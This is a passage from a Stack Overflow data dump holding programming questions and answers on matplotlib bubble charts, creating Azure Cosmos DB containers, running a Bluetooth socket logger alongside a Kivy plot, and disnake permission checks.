orth = np.array([dir_vec[1], -dir_vec[0]])
# test which direction to go
new_point1 = (self.bubbles[i, :2] + orth *
self.step_dist)
new_point2 = (self.bubbles[i, :2] - orth *
self.step_dist)
dist1 = self.center_distance(
self.com, np.array([new_point1]))
dist2 = self.center_distance(
self.com, np.array([new_point2]))
new_point = new_point1 if dist1 < dist2 else new_point2
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
if moves / len(self.bubbles) < 0.1:
self.step_dist = self.step_dist / 2
def plot(self, ax, labels, colors):
"""
Draw the bubble plot.
Parameters
----------
ax : matplotlib.axes.Axes
labels : list
Labels of the bubbles.
colors : list
Colors of the bubbles.
"""
for i in range(len(self.bubbles)):
circ = plt.Circle(
self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])
ax.add_patch(circ)
ax.text(*self.bubbles[i, :2], labels[i],
horizontalalignment='center', verticalalignment='center')
This class handles the chart-making logic; the constructor signature is BubbleChart(area, bubble_spacing=0).
Example code using the Bubble Chart:
browser_market_share = {
'browsers': ['firefox', 'chrome', 'safari', 'edge', 'ie', 'opera'],
'market_share': [8.61, 69.55, 8.36, 4.12, 2.76, 2.43],
'color': ['#5A69AF', '#579E65', '#F9C784', '#FC944A', '#F24C00', '#00B825']
}
bubble_chart = BubbleChart(area=browser_market_share['market_share'],
bubble_spacing=0.1)
bubble_chart.collapse()
fig, ax = plt.subplots(subplot_kw=dict(aspect="equal"))
bubble_chart.plot(
ax, browser_market_share['browsers'], browser_market_share['color'])
ax.axis("off")
ax.relim()
ax.autoscale_view()
ax.set_title('Browser market share')
plt.show()
And this would be the output chart:
You can find this code in Matplotlib's documentation. Here
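On the second part of the question (getting bubble coordinates): after collapse(), the positions can be read straight off the instance, since the class stores x, y, radius, and area per bubble in its bubbles array:
xy = bubble_chart.bubbles[:, :2]  # (x, y) center of each bubble
r = bubble_chart.bubbles[:, 2]    # radius of each bubble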
A:
From Matplotlib's packed bubble chart, you could modify the code and change the shape of the initial grid layout from a square grid to a rectangle grid.
class BubbleChart:
def __init__(self, area, bubble_spacing=0.01):
"""
Setup for bubble collapse.
Parameters
----------
area : array-like
Area of the bubbles.
bubble_spacing : float, default: 0
Minimal spacing between bubbles after collapsing.
Notes
-----
If "area" is sorted, the results might look weird.
"""
area = np.asarray(area)
r = np.sqrt(area / np.pi)
self.bubble_spacing = bubble_spacing
self.bubbles = np.ones((len(area), 4))
self.bubbles[:, 2] = r
self.bubbles[:, 3] = area
self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing
self.step_dist = self.maxstep / 2
# change the initial grid to a rectangle grid
length_x = np.ceil(len(self.bubbles)/2)
length_y = 2
grid_x = np.arange(length_x)*self.maxstep
grid_y = np.arange(length_y)*self.maxstep
gx, gy = np.meshgrid(grid_x, grid_y)
self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]
self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]
self.com = self.center_of_mass()
def center_of_mass(self):
return np.average(
self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]
)
def center_distance(self, bubble, bubbles):
return np.hypot(bubble[0] - bubbles[:, 0],
bubble[1] - bubbles[:, 1])
def outline_distance(self, bubble, bubbles):
center_distance = self.center_distance(bubble, bubbles)
return center_distance - bubble[2] - \
bubbles[:, 2] - self.bubble_spacing
def check_collisions(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
return len(distance[distance < 0])
def collides_with(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
idx_min = np.argmin(distance)
return idx_min if type(idx_min) == np.ndarray else [idx_min]
def collapse(self, n_iterations=250):
"""
Move bubbles to the center of mass.
Parameters
----------
n_iterations : int, default: 50
Number of moves to perform.
"""
for _i in range(n_iterations):
moves = 0
for i in range(len(self.bubbles)):
rest_bub = np.delete(self.bubbles, i, 0)
# try to move directly towards the center of mass
# direction vector from bubble to the center of mass
dir_vec = self.com - self.bubbles[i, :2]
# shorten direction vector to have length of 1
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate new bubble position
new_point = self.bubbles[i, :2] + dir_vec * self.step_dist
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
# check whether new bubble collides with other bubbles
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
moves += 1
else:
# try to move around a bubble that you collide with
# find colliding bubble
for colliding in self.collides_with(new_bubble, rest_bub):
# calculate direction vector
dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate orthogonal vector
orth = np.array([dir_vec[1], -dir_vec[0]])
# test which direction to go
new_point1 = (self.bubbles[i, :2] + orth *
self.step_dist)
new_point2 = (self.bubbles[i, :2] - orth *
self.step_dist)
dist1 = self.center_distance(
self.com, np.array([new_point1]))
dist2 = self.center_distance(
self.com, np.array([new_point2]))
new_point = new_point1 if dist1 < dist2 else new_point2
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
if moves / len(self.bubbles) < 0.1:
self.step_dist = self.step_dist / 2
def plot(self, ax, labels, colors):
"""
Draw the bubble plot.
Parameters
----------
ax : matplotlib.axes.Axes
labels : list
Labels of the bubbles.
colors : list
Colors of the bubbles.
"""
for i in range(len(self.bubbles)):
circ = plt.Circle(
self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])
ax.add_patch(circ)
ax.text(*self.bubbles[i, :2], labels[i],
horizontalalignment='center', verticalalignment='center')
Basically, what I have done here is to change the initial grid (n*n grid) to a rectangle grid (2*n grid)
length_x = np.ceil(len(self.bubbles)/2)
length_y = 2
grid_x = np.arange(length_x)*self.maxstep
grid_y = np.arange(length_y)*self.maxstep
gx, gy = np.meshgrid(grid_x, grid_y)
self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]
self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]
bubble chart in a rectangle format
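Usage is the same as for the square version. For example, reusing the browser data from the earlier answer (a sketch, assuming this modified class is in scope):
bubble_chart = BubbleChart(area=browser_market_share['market_share'],
                           bubble_spacing=0.1)
bubble_chart.collapse()

fig, ax = plt.subplots(subplot_kw=dict(aspect="equal"))
bubble_chart.plot(ax, browser_market_share['browsers'],
                  browser_market_share['color'])
ax.axis("off")
ax.relim()
ax.autoscale_view()
plt.show()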
| packed bubble chart stack in a rectangle with Python | I want to make a packed bubble chart with Python but stack bubbles in a rectangle-ish format something like this:
What is the best way to achieve this? Also is there any Python package that returns the position (coordinate) of bubbles?
| [
"I hope the Treemap chart works for your use case in here.\nplotly implementation\nsquarify implementation\n",
"Plotly is your friend.\nConsidering the example dataframe:\nd = {'Party': ['Democrat', 'Democrat', 'Republican', 'Republican'], 'Keyword': ['Donkey', 'Left', 'Elephant', 'Right'], 'x': [1, 2, 3, 4], 'y': [1, 1, 3, 4], 'counts': [100, 342, 43, 666]}\ndf = pd.DataFrame(data=d)\n\nImport plotly.express:\nimport plotly.express as px\n\nAnd then use the scatter plot to create your Bubble chart:\nfig = px.scatter(df, x=\"x\", y=\"y\",\n size='counts', color='Party', text='Keyword', size_max=60)\nfig.show()\n\n\nNote: this answer assumes that you know where to plot your bubbles in the first place (the x and y coordinates in the dataframe).\n",
"Matplotlib offers some premade more niche charts like the one you describe.\nYou can take a look at the documentation with all these charts Here\nSo following the documentation, we then define the BubbleChart class as follows:\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass BubbleChart:\n def __init__(self, area, bubble_spacing=0):\n \"\"\"\n Setup for bubble collapse.\n\n Parameters\n ----------\n area : array-like\n Area of the bubbles.\n bubble_spacing : float, default: 0\n Minimal spacing between bubbles after collapsing.\n\n Notes\n -----\n If \"area\" is sorted, the results might look weird.\n \"\"\"\n area = np.asarray(area)\n r = np.sqrt(area / np.pi)\n\n self.bubble_spacing = bubble_spacing\n self.bubbles = np.ones((len(area), 4))\n self.bubbles[:, 2] = r\n self.bubbles[:, 3] = area\n self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing\n self.step_dist = self.maxstep / 2\n\n # calculate initial grid layout for bubbles\n length = np.ceil(np.sqrt(len(self.bubbles)))\n grid = np.arange(length) * self.maxstep\n gx, gy = np.meshgrid(grid, grid)\n self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]\n self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]\n\n self.com = self.center_of_mass()\n\n def center_of_mass(self):\n return np.average(\n self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]\n )\n\n def center_distance(self, bubble, bubbles):\n return np.hypot(bubble[0] - bubbles[:, 0],\n bubble[1] - bubbles[:, 1])\n\n def outline_distance(self, bubble, bubbles):\n center_distance = self.center_distance(bubble, bubbles)\n return center_distance - bubble[2] - \\\n bubbles[:, 2] - self.bubble_spacing\n\n def check_collisions(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n return len(distance[distance < 0])\n\n def collides_with(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n idx_min = np.argmin(distance)\n return idx_min if type(idx_min) == np.ndarray else [idx_min]\n\n def collapse(self, n_iterations=50):\n \"\"\"\n Move bubbles to the center of mass.\n\n Parameters\n ----------\n n_iterations : int, default: 50\n Number of moves to perform.\n \"\"\"\n for _i in range(n_iterations):\n moves = 0\n for i in range(len(self.bubbles)):\n rest_bub = np.delete(self.bubbles, i, 0)\n # try to move directly towards the center of mass\n # direction vector from bubble to the center of mass\n dir_vec = self.com - self.bubbles[i, :2]\n\n # shorten direction vector to have length of 1\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n\n # calculate new bubble position\n new_point = self.bubbles[i, :2] + dir_vec * self.step_dist\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n\n # check whether new bubble collides with other bubbles\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n moves += 1\n else:\n # try to move around a bubble that you collide with\n # find colliding bubble\n for colliding in self.collides_with(new_bubble, rest_bub):\n # calculate direction vector\n dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n # calculate orthogonal vector\n orth = np.array([dir_vec[1], -dir_vec[0]])\n # test which direction to go\n new_point1 = (self.bubbles[i, :2] + orth *\n self.step_dist)\n new_point2 = (self.bubbles[i, :2] - orth *\n self.step_dist)\n dist1 = self.center_distance(\n self.com, np.array([new_point1]))\n dist2 = self.center_distance(\n self.com, 
np.array([new_point2]))\n new_point = new_point1 if dist1 < dist2 else new_point2\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n\n if moves / len(self.bubbles) < 0.1:\n self.step_dist = self.step_dist / 2\n\n def plot(self, ax, labels, colors):\n \"\"\"\n Draw the bubble plot.\n\n Parameters\n ----------\n ax : matplotlib.axes.Axes\n labels : list\n Labels of the bubbles.\n colors : list\n Colors of the bubbles.\n \"\"\"\n for i in range(len(self.bubbles)):\n circ = plt.Circle(\n self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])\n ax.add_patch(circ)\n ax.text(*self.bubbles[i, :2], labels[i],\n horizontalalignment='center', verticalalignment='center')\n\n\nThis class handles the chart making logic with the following signature: BubbleChart(area,bubble_spacing, **kwargs)\nExample code using the Bubble Chart:\nbrowser_market_share = {\n 'browsers': ['firefox', 'chrome', 'safari', 'edge', 'ie', 'opera'],\n 'market_share': [8.61, 69.55, 8.36, 4.12, 2.76, 2.43],\n 'color': ['#5A69AF', '#579E65', '#F9C784', '#FC944A', '#F24C00', '#00B825']\n}\n\nbubble_chart = BubbleChart(area=browser_market_share['market_share'],\n bubble_spacing=0.1)\nbubble_chart.collapse()\n\nfig, ax = plt.subplots(subplot_kw=dict(aspect=\"equal\"))\nbubble_chart.plot(\n ax, browser_market_share['browsers'], browser_market_share['color'])\nax.axis(\"off\")\nax.relim()\nax.autoscale_view()\nax.set_title('Browser market share')\n\nplt.show()\n\nAnd this would be the output chart:\n\nYou can find this code in Matplotlib's documentation. Here\n",
"From Matplotlib's packed bubble chart, you could modify the code and change the shape of initial grid layout from a square grid to a rectangle grid.\nclass BubbleChart:\ndef __init__(self, area, bubble_spacing=0.01):\n \"\"\"\n Setup for bubble collapse.\n\n Parameters\n ----------\n area : array-like\n Area of the bubbles.\n bubble_spacing : float, default: 0\n Minimal spacing between bubbles after collapsing.\n\n Notes\n -----\n If \"area\" is sorted, the results might look weird.\n \"\"\"\n area = np.asarray(area)\n r = np.sqrt(area / np.pi)\n\n self.bubble_spacing = bubble_spacing\n self.bubbles = np.ones((len(area), 4))\n self.bubbles[:, 2] = r\n self.bubbles[:, 3] = area\n self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing\n self.step_dist = self.maxstep / 2\n\n # change the initial grid to a rectangle grid \n length_x = np.ceil(len(self.bubbles)/2)\n length_y = 2\n grid_x = np.arange(length_x)*self.maxstep\n grid_y = np.arange(length_y)*self.maxstep\n gx, gy = np.meshgrid(grid_x, grid_y)\n self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]\n self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]\n\n self.com = self.center_of_mass()\n\ndef center_of_mass(self):\n return np.average(\n self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]\n )\n\ndef center_distance(self, bubble, bubbles):\n return np.hypot(bubble[0] - bubbles[:, 0],\n bubble[1] - bubbles[:, 1])\n\ndef outline_distance(self, bubble, bubbles):\n center_distance = self.center_distance(bubble, bubbles)\n return center_distance - bubble[2] - \\\n bubbles[:, 2] - self.bubble_spacing\n\ndef check_collisions(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n return len(distance[distance < 0])\n\ndef collides_with(self, bubble, bubbles):\n distance = self.outline_distance(bubble, bubbles)\n idx_min = np.argmin(distance)\n return idx_min if type(idx_min) == np.ndarray else [idx_min]\n\ndef collapse(self, n_iterations=250):\n \"\"\"\n Move bubbles to the center of mass.\n\n Parameters\n ----------\n n_iterations : int, default: 50\n Number of moves to perform.\n \"\"\"\n for _i in range(n_iterations):\n moves = 0\n for i in range(len(self.bubbles)):\n rest_bub = np.delete(self.bubbles, i, 0)\n # try to move directly towards the center of mass\n # direction vector from bubble to the center of mass\n dir_vec = self.com - self.bubbles[i, :2]\n\n # shorten direction vector to have length of 1\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n\n # calculate new bubble position\n new_point = self.bubbles[i, :2] + dir_vec * self.step_dist\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n\n # check whether new bubble collides with other bubbles\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n moves += 1\n else:\n # try to move around a bubble that you collide with\n # find colliding bubble\n for colliding in self.collides_with(new_bubble, rest_bub):\n # calculate direction vector\n dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]\n dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))\n # calculate orthogonal vector\n orth = np.array([dir_vec[1], -dir_vec[0]])\n # test which direction to go\n new_point1 = (self.bubbles[i, :2] + orth *\n self.step_dist)\n new_point2 = (self.bubbles[i, :2] - orth *\n self.step_dist)\n dist1 = self.center_distance(\n self.com, np.array([new_point1]))\n dist2 = self.center_distance(\n self.com, np.array([new_point2]))\n new_point = new_point1 if dist1 < dist2 else 
new_point2\n new_bubble = np.append(new_point, self.bubbles[i, 2:4])\n if not self.check_collisions(new_bubble, rest_bub):\n self.bubbles[i, :] = new_bubble\n self.com = self.center_of_mass()\n\n if moves / len(self.bubbles) < 0.1:\n self.step_dist = self.step_dist / 2\n\ndef plot(self, ax, labels, colors):\n \"\"\"\n Draw the bubble plot.\n\n Parameters\n ----------\n ax : matplotlib.axes.Axes\n labels : list\n Labels of the bubbles.\n colors : list\n Colors of the bubbles.\n \"\"\"\n for i in range(len(self.bubbles)):\n circ = plt.Circle(\n self.bubbles[i, :2], self.bubbles[i, 2], color=colors[i])\n ax.add_patch(circ)\n ax.text(*self.bubbles[i, :2], labels[i],\n horizontalalignment='center', verticalalignment='center')\n\nBasically, what I have done here is to change the initial grid (n*n grid) to a rectangle grid (2*n grid)\nlength_x = np.ceil(len(self.bubbles)/2)\nlength_y = 2\ngrid_x = np.arange(length_x)*self.maxstep\ngrid_y = np.arange(length_y)*self.maxstep\ngx, gy = np.meshgrid(grid_x, grid_y)\nself.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]\nself.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]\n\nbubble chart in a rectangle format\n"
] | [
0,
0,
0,
0
] | [] | [] | [
"bubble_chart",
"python",
"visualization"
] | stackoverflow_0070298696_bubble_chart_python_visualization.txt |
Q:
How to combine these two codes in Kivy?
I have two pieces of code and I want to combine the Python code into the Kivy code.
python code:
import csv
import socket
import datetime
import time
from itertools import zip_longest
Time =[]
Price = []
fields = ['Time', 'Price']
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
port = 1
hostMACAddress = ''
s.bind((hostMACAddress,port))
s.listen(1)
client, address = s.accept()
while(1):
message_received = client.recv(1024).decode('utf-8')
data = message_received
Price.append(float(data))
Time.append(time.strftime("%a %I:%M:%S %p"))
item_1 = Time
item_2 = Price
data = [item_1, item_2]
export_data = zip_longest(*data, fillvalue = '')
with open('data1.csv', 'w', newline='') as file:
write = csv.writer(file)
write.writerow(("Time", "Price"))
write.writerows(export_data)
s.close()
kivy code:
from kivy.lang import Builder
from kivymd.app import MDApp
from kivy.uix.floatlayout import FloatLayout
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg
import matplotlib.pyplot as plt
import socket
import os
import numpy as np
import datetime
import matplotlib.animation as animation
from matplotlib import style
import csv
import pandas as pd
from matplotlib.animation import FuncAnimation
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
x_values = []
y_values = []
def animate(i):
data = pd.read_csv('data1.csv')
x_values = data['Time']
y_values = data['Price']
plt.cla()
plt.plot(x_values, y_values, color='green', linestyle='dashed', linewidth = 3, marker='o', markerfacecolor='blue', markersize=12)
plt.gcf().autofmt_xdate()
plt.tight_layout()
ani = FuncAnimation(plt.gcf(), animate, 5000)
plt.tight_layout()
class Matty(FloatLayout):
def __init__(self , **kwargs):
super(). __init__(**kwargs)
box = self.ids.box
box.add_widget(FigureCanvasKivyAgg(plt.gcf()))
def save_it(self):
pass
class MainApp(MDApp):
def build(self):
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "BlueGray"
Builder.load_file('matty.kv')
return Matty()
MainApp().run()
kv file:
<Matty>
BoxLayout:
id:box
size_hint_y: .75
pos_hint: {'x':0.0 , 'y':0.0}
I want to run the Python code inside the Kivy code so I have a single program. Every time I do this, the Kivy program does not respond. How can I get the data from the socket, save it to a .csv file, and then plot the .csv data in Kivy continuously?
A:
Since your first code has no classes or methods, it will run its loop forever as soon as it is imported by Python.
You can still use that code by putting its import in a new thread. You can use something like:
def doit(self, button):
print('importing')
threading.Thread(target=self.do_import, daemon=True).start()
print('imported')
def do_import(self):
import python_code
where python_code is the name of the python file containing your python code (leave off the .py).
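For context, a minimal sketch of how those methods could sit on the Matty class from the question (the module name python_code is hypothetical, and doit would be bound to a button or called from __init__):
import threading

class Matty(FloatLayout):
    def doit(self, *args):
        # run the blocking socket loop without freezing the Kivy UI
        threading.Thread(target=self.do_import, daemon=True).start()

    def do_import(self):
        import python_code  # hypothetical module holding the socket loop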
| How to combine these two codes in Kivy? | I have two codes and I want to combine Python code into Kivy code.
python code:
import csv
import socket
import datetime
import time
from itertools import zip_longest
Time =[]
Price = []
fields = ['Time', 'Price']
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
port = 1
hostMACAddress = ''
s.bind((hostMACAddress,port))
s.listen(1)
client, address = s.accept()
while(1):
message_received = client.recv(1024).decode('utf-8')
data = message_received
Price.append(float(data))
Time.append(time.strftime("%a %I:%M:%S %p"))
item_1 = Time
item_2 = Price
data = [item_1, item_2]
export_data = zip_longest(*data, fillvalue = '')
with open('data1.csv', 'w', newline='') as file:
write = csv.writer(file)
write.writerow(("Time", "Price"))
write.writerows(export_data)
s.close()
kivy code:
from kivy.lang import Builder
from kivymd.app import MDApp
from kivy.uix.floatlayout import FloatLayout
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg
import matplotlib.pyplot as plt
import socket
import os
import numpy as np
import datetime
import matplotlib.animation as animation
from matplotlib import style
import csv
import pandas as pd
from matplotlib.animation import FuncAnimation
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
x_values = []
y_values = []
def animate(i):
data = pd.read_csv('data1.csv')
x_values = data['Time']
y_values = data['Price']
plt.cla()
plt.plot(x_values, y_values, color='green', linestyle='dashed', linewidth = 3, marker='o', markerfacecolor='blue', markersize=12)
plt.gcf().autofmt_xdate()
plt.tight_layout()
ani = FuncAnimation(plt.gcf(), animate, 5000)
plt.tight_layout()
class Matty(FloatLayout):
def __init__(self , **kwargs):
super(). __init__(**kwargs)
box = self.ids.box
box.add_widget(FigureCanvasKivyAgg(plt.gcf()))
def save_it(self):
pass
class MainApp(MDApp):
def build(self):
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "BlueGray"
Builder.load_file('matty.kv')
return Matty()
MainApp().run()
kv file:
<Matty>
BoxLayout:
id:box
size_hint_y: .75
pos_hint: {'x':0.0 , 'y':0.0}
I want to run the python code in the Kivy code to have a code. Every time I do this, the Kivy program does not respond. How can I get the data from the socket and save it to .csv file and then plot .csv data in kivy continuously.
| [
"Since your first code has no classes or methods, it will run its loop forever as soon as it is imported by python.\nYou can still use that code by putting its import in a new thread. You can use something like:\ndef doit(self, button):\n print('importing')\n threading.Thread(target=self.do_import, daemon=True).start()\n print('imported')\n\ndef do_import(self):\n import python_code\n\nwhere python_code is the name of the python file containing your python code (leave off the .py).\n"
] | [
0
] | [] | [] | [
"kivy",
"matplotlib_widget",
"python",
"real_time"
] | stackoverflow_0074601897_kivy_matplotlib_widget_python_real_time.txt |
Q:
Python Program to create Container if not exist with partition key and unique Key
I want to write a Python script to create a container, with a partition key and a unique key, only if it does not already exist.
Steps for Creating Alert Container
1. Create Container With Container ID: alerts
2. Add Partition Key as /user_tenant
3. Add Unique Key as /alert_id
reference link: https://github.com/Azure/azure-cosmos-python#create-a-container
Please suggest the API that will create the container if it is not present.
A:
@Gaurav Mantri
Below is the working code as suggested by you.
For uniqueKeys, we need to add it inside uniqueKeyPolicy, as shown in the code below.
import azure.cosmos.documents as documents
from azure.cosmos import cosmos_client, http_constants, errors
import os
url = os.environ['COSMOS_DB_END_POINT']
key = os.environ['COSMOS_DB_MASTER_KEY']
database_name = os.environ["COSMOS_DB_DATABASE_ID"]
client = cosmos_client.CosmosClient(url, {'masterKey': key})
container_definition = {'id': 'alerts_test',
'partitionKey':
{
'paths': ['/user_tenant'],
'kind': documents.PartitionKind.Hash
},
'uniqueKeyPolicy': {
'uniqueKeys':
[
{'paths': ['/alert_id']}
]
}
}
try:
container = client.CreateContainer("dbs/" + database_name, container_definition, {'offerThroughput': 400})
print("New Container Created:")
print(container)
except errors.HTTPFailure as e:
if e.status_code == http_constants.StatusCodes.CONFLICT:
container = client.ReadContainer("dbs/" + database_name + "/colls/" + container_definition['id'])
print(container)
else:
raise e
A:
Here is my answer.
Create Connection
import azure.cosmos.cosmos_client as cosmos_client
COMOS_MASTER_KEY = "*****"
COMOS_ENDPOINT = "https://account.documents.azure.com:port/"
client = cosmos_client.CosmosClient(url=COMOS_ENDPOINT, credential={"masterKey":COMOS_MASTER_KEY})
Create Database If Not Exist
database = client.create_database_if_not_exists({'id': database_name,'offer_throughput':20000})
Create Collection If it does Not Exist
from azure.cosmos import PartitionKey

database.create_container_if_not_exists(id="collection_name", partition_key=PartitionKey(path="/partition_key_path"), offer_throughput=1000)
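To also cover the unique key from the question, create_container_if_not_exists accepts a unique key policy in the v4 SDK; a sketch, assuming the dict shape from the first answer carries over:
container = database.create_container_if_not_exists(
    id="alerts",
    partition_key=PartitionKey(path="/user_tenant"),
    unique_key_policy={"uniqueKeys": [{"paths": ["/alert_id"]}]},  # same shape as the first answer
    offer_throughput=400,
)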
| Python Program to create Container if not exist with partition key and unique Key | I want to write python script to create container only if it not exist with partition key and unique key.
Steps for Creating Alert Container
1. Create Container With Container ID: alerts
2. Add Partition Key as /user_tenant
3. Add Unique Key as /alert_id
reference link: https://github.com/Azure/azure-cosmos-python#create-a-container
plz suggest the api that will create container if it not present.
| [
"@Gaurav Mantri\nBelow is the working code as suggested by you.\nfor uniqueKeys we need to add it inside uniqueKeyPolicy as shown in below code.\nimport azure.cosmos.documents as documents\nfrom azure.cosmos import cosmos_client, http_constants, errors\nimport os\n\nurl = os.environ['COSMOS_DB_END_POINT']\nkey = os.environ['COSMOS_DB_MASTER_KEY']\ndatabase_name = os.environ[\"COSMOS_DB_DATABASE_ID\"]\nclient = cosmos_client.CosmosClient(url, {'masterKey': key})\n\ncontainer_definition = {'id': 'alerts_test',\n 'partitionKey':\n {\n 'paths': ['/user_tenant'],\n 'kind': documents.PartitionKind.Hash\n },\n 'uniqueKeyPolicy': {\n 'uniqueKeys':\n [\n {'paths': ['/alert_id']}\n ]\n }\n }\n\ntry:\n container = client.CreateContainer(\"dbs/\" + database_name, container_definition, {'offerThroughput': 400})\n print(\"New Container Created:\")\n print(container)\nexcept errors.HTTPFailure as e:\n if e.status_code == http_constants.StatusCodes.CONFLICT:\n container = client.ReadContainer(\"dbs/\" + database_name + \"/colls/\" + container_definition['id'])\n print(container)\n else:\n raise e\n\n",
"Here is my answer.\nCreate Connection\nimport azure.cosmos.cosmos_client as cosmos_client\n\nCOMOS_MASTER_KEY = \"*****\" \nCOMOS_ENDPOINT = \"https://account.documents.azure.com:port/\" \n\nclient = cosmos_client.CosmosClient(url=COMOS_ENDPOINT, credential={\"masterKey\":COMOS_MASTER_KEY})\n\nCreate Database If Not Exist\ndatabase = client.create_database_if_not_exists({'id': database_name,'offer_throughput':20000})\n\nCreate Collection If it does Not Exist\ndatabase.create_container_if_not_exists(id=\"collection_name\",partition_key=PartitionKey(path=\"/partition_key_path\"),offer_throughput=1000)\n\n"
] | [
0,
0
] | [] | [] | [
"azure_cosmosdb",
"python"
] | stackoverflow_0060772092_azure_cosmosdb_python.txt |
Q:
How to make a check of user permissions in disnake or discord.py
I've got code with permissions. I need to check a member's permissions and, if the member doesn't have such permissions, send a message.
Main code:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
#try:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
What i want to have:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
if ctx.author.guild_permissions.view_audit_log:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
else:
await ctx.send("You don`t have such permissions!")
Please help me. I tried different variants and none of them worked.
A:
I think you are not getting what you want because you are trying to integrate both at once. From what I can see from your description and code, the easiest solution is to remove @commands.has_permissions(view_audit_log=True) from your "what I want to have" section of code. However, if you don't want to add an extra if/else statement sending "you don't have permissions" under every command, I would suggest creating an error handler. Using this method, you would be able to use the first block of code you have listed in your question. Here is a very basic sample of the one I use, which handles a user lacking permissions for a command. You'll probably need to change it to fit your specific bot, but it's a start:
@client.event
async def on_command_error(ctx, error):
await ctx.send(error) # this sends the error where the user is attempting to use a command. This means if the user is missing the right permissions to use a command, it will send something like "missing permissions" to the user. Which I think is what you are looking for
The "what I want to have" code is not working because the code you have under it is unreachable unless the user has the audit_log permissions. And if they already have those permissions, the if and else statements checking permissions are not very useful. An error handler is in my opinion good to have and has helped me a ton with my bots. Hope this helps
| How to make a ckeck of user permissions in disnake or discord.py | I've got a code with permissions. I need to check a member permissions and if member don`t have such permissions send a message
Main code:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
#try:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
What i want to have:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
if ctx.author.guild_permissions.view_audit_log:
await member.add_roles(role)
